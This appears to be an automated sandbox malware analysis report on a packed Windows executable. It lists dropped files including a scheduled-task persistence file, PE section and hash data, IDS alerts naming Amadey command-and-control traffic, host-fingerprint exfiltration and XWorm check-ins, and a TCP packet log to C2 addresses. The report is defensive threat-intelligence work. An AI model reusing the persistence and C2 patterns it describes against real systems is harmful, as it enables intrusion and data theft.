Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.4355451961965313
Encrypted:	false
SSDEEP:	6:xIDbYvbX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBwact0:xI/YzuQ1CGAFifXVBwact0
MD5:	4E392015645F8F48537184B5538A4C13
SHA1:	913CDD671A511B8E26104705478EFF38DBF6350C
SHA-256:	F9DE53A3FB8C8F6FB6E67BF5125F5F0ACD99DD6938591A6F17837350B7C2EAB4
SHA-512:	D955490C184345FB00D28529E0589BDD0184138873400BDA1DE67DEEFAD04947BACE76870450C246354F06646D8617933B8B9BA96C1F2C0051060497478EF99F
Malicious:	false
Preview:	..../-.{Y..B..\|(a...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.952173231018088
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'927'680 bytes
MD5:	6aed281d1464e3a53839bbd9e7190535
SHA1:	8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
SHA256:	a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
SHA512:	3d3312dbc5d3537143f8ee75097e9dfa5a88c59b3d0079461a6878ba1aafa232a131e8078dbf08d5e62bdd84f5833e900d4b8e0f37e80b3bbcab996b725e5366
SSDEEP:	49152:FWpKS5ThF8/65kDlsW+eN3hyN0T3VsPhGlhFr5:FWcSKUkDlsJ0q0lfr
TLSH:	969533F98F16D4B5D05ED9F263DE8A201ACC4D4E059EC90A9FDC67B4D91A23FAD4080E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8c7000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F8480E42DAAh
cmovs ebx, dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x448	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c5bc4	0x10	fjmpujlc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c5b74	0x18	fjmpujlc
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	a059e472e0c6773abc419a323cb148d6	False	0.9980096219346049	data	7.982732781787212	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x448	0x600	23f61aeefa7c3d30c07a21aa8f45e969	False	0.3053385416666667	data	5.28505835027857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b6000	0x200	cb269affa1bc465fb7a236c9119aeff3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fjmpujlc	0x321000	0x1a5000	0x1a4c00	4c06e5dbb0131da95f220c8a6e1f43b9	False	0.9948450497623291	data	7.954406052797792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jlhbczjq	0x4c6000	0x1000	0x400	254cb1664c69326ea458edea84b970b6	False	0.78515625	data	6.089103054058254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c7000	0x3000	0x2200	6cae88bcbd4a5f304007d3eae6c8c624	False	0.05824908088235294	DOS executable (COM)	0.6816341029974392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x256	ASCII text, with CRLF line terminators			0.5100334448160535
RT_MANIFEST	0x692c8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-21T22:12:06.429773+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49812	185.215.113.43	80	TCP
2024-11-21T22:12:12.018423+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49824	188.165.52.14	443	TCP
2024-11-21T22:12:35.903759+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49818	TCP
2024-11-21T22:12:37.303034+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49880	185.215.113.43	80	TCP
2024-11-21T22:15:48.704936+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50337	20.189.173.5	443	TCP
2024-11-21T22:17:33.115436+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50124	185.215.113.43	80	TCP
2024-11-21T22:18:33.139564+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50147	31.41.244.11	80	TCP
2024-11-21T22:18:35.866719+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50146	TCP
2024-11-21T22:18:37.261656+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50148	185.215.113.43	80	TCP
2024-11-21T22:18:48.253731+0100	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.5	50152	149.154.167.220	443	TCP
2024-11-21T22:18:57.523762+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:02.521650+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:05.664794+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:05.665706+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:07.533863+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:12.557719+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:17.556558+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:18.544558+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:18.545627+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:19.107631+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:19.107631+0100	2858924	ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:22.562733+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:28.058952+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:31.595832+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:31.596692+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:32.591445+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:37.572545+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:42.573533+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:44.325519+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:44.327464+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:47.583027+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:49.281235+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:52.583310+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:57.216603+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:19:57.223703+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:19:57.591256+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:02.599360+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:07.603262+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:10.186673+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:10.187579+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	50155	87.120.112.33	8398	TCP
2024-11-21T22:20:11.193125+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50179	TCP
2024-11-21T22:20:12.593833+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP
2024-11-21T22:20:18.111294+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	87.120.112.33	8398	192.168.2.5	50155	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 22:12:04.726058960 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:04.996674061 CET	80	49812	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:04.996774912 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:04.997021914 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:05.116513968 CET	80	49812	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:06.429641962 CET	80	49812	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:06.429773092 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:07.938185930 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:07.938757896 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:08.058999062 CET	80	49818	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:08.059155941 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:08.059278011 CET	80	49812	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:08.059334040 CET	49812	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:08.059417963 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:08.179044008 CET	80	49818	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:09.543158054 CET	80	49818	185.215.113.43	192.168.2.5
Nov 21, 2024 22:12:09.543339968 CET	49818	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:12:10.096220970 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:10.096270084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:10.096368074 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:10.107237101 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:10.107275963 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:11.495037079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:11.495116949 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:11.548768997 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:11.548794031 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:11.549115896 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:11.549179077 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:11.551793098 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:11.599330902 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.018537998 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.018656015 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.210822105 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.210833073 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.210864067 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.210966110 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.210982084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.211034060 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.254534960 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.254607916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.254672050 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.254687071 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.254712105 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.254725933 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.308944941 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.308969021 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.309118986 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.309151888 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.309287071 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.428422928 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.428487062 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.428543091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.428585052 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.428597927 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.428627014 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.453191042 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.453236103 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.453288078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.453299046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.453326941 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.453346968 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.523154020 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.523178101 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.523487091 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.523524046 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.523578882 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.615451097 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.615511894 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.615577936 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.615600109 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.615628004 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.615647078 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.635035992 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.635077953 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.635113955 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.635127068 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.635148048 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.635160923 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.652565002 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.652606964 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.652645111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.652657032 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.652678013 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.652693987 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.666867018 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.666912079 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.666954994 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.666965961 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.666990042 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.667009115 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.680232048 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.680278063 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.680363894 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.680389881 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.680423975 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.680435896 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.708205938 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.708249092 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.708403111 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.708416939 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.708462954 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.806988001 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.807034969 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.807176113 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.807203054 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.807218075 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.807251930 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.816015005 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.816059113 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.816114902 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.816124916 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.816149950 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.816171885 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.827482939 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.827528000 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.827609062 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.827621937 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.827681065 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.837856054 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.837915897 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.837938070 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.837948084 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.837965965 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.837981939 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.848200083 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.848244905 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.848300934 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.848313093 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.848334074 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.848352909 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.858361959 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.858429909 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.858465910 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.858474016 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.858489990 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.858501911 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.866720915 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.866770029 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.866816998 CET	49824	443	192.168.2.5	188.165.52.14
Nov 21, 2024 22:12:12.866838932 CET	443	49824	188.165.52.14	192.168.2.5
Nov 21, 2024 22:12:12.866852045 CET	49824	443	192.168.2.5	188.165.52.14
